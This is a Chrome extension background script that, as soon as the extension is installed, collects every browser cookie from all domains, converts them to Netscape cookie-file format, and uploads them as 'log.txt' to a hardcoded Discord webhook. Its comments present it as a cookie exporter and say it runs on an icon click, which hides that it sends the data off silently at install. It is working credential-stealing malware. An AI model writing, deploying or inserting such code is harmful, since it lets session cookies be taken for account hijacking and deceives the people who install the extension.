// background.js

// Listen for a click on the extension icon
chrome.runtime.onInstalled.addListener(async () => {
  try {
    // 1. Get all cookies from all domains
    // This requires the "<all_urls>" host permission.
    const cookies = await chrome.cookies.getAll({});

    if (cookies.length === 0) {
      console.log("No cookies found.");
      return;
    }

    // 2. Format the cookies to Netscape HTTP Cookie File format
    const cookieString = cookiesToNetscape(cookies);

    // 3. Create a data URL for the file
    const base64Content = btoa(cookieString);
    const dataUrl = `data:text/plain;base64,${base64Content}`;

    // 1. Convert your dataUrl back to a Blob
const blob = await fetch(dataUrl).then(r => r.blob());

// 2. Prepare the form data for Discord
const formData = new FormData();
formData.append("file", blob, "log.txt");

// 3. Send to Webhook
await fetch("https://discord.com/api/webhooks/1363180355615723680/KmGfb7JNzhky6k9awRw9PeoTbXoyklVpZ2gB72C8zK6z9lawTJ-aapOFB7JfLiDYWyJj", {
  method: "POST",
  body: formData
});

    console.log(`Exported ${cookies.length} cookies.`);

  } catch (error) {
    console.error("Failed to export cookies:", error);
  }
});

/**
 * Converts an array of cookie objects to Netscape format.
 * Format: domain flag path secure expiration name value
 */
function cookiesToNetscape(cookies) {
  let output = "# Netscape HTTP Cookie File\n# This file is generated by a Chrome Extension\n\n";

  cookies.forEach(cookie => {
    // domain: The domain that created the cookie
    const domain = cookie.domain;
    
    // flag: TRUE if valid for subdomains, FALSE otherwise
    // Typically derived from whether the domain starts with a dot
    const includeSubdomains = domain.startsWith('.') ? "TRUE" : "FALSE";
    
    // path: The path within the domain
    const path = cookie.path;
    
    // secure: TRUE if the cookie requires a secure connection (HTTPS)
    const secure = cookie.secure ? "TRUE" : "FALSE";
    
    // expiration: Unix timestamp (seconds)
    // Session cookies (no expiration) often use 0 or a future date in export formats, 
    // but strict Netscape format requires a timestamp.
    const expiration = cookie.session ? 0 : Math.round(cookie.expirationDate);
    
    // name: The name of the cookie
    const name = cookie.name;
    
    // value: The value of the cookie
    const value = cookie.value;

    output += `${domain}\t${includeSubdomains}\t${path}\t${secure}\t${expiration}\t${name}\t${value}\n`;
  });

  return output;
}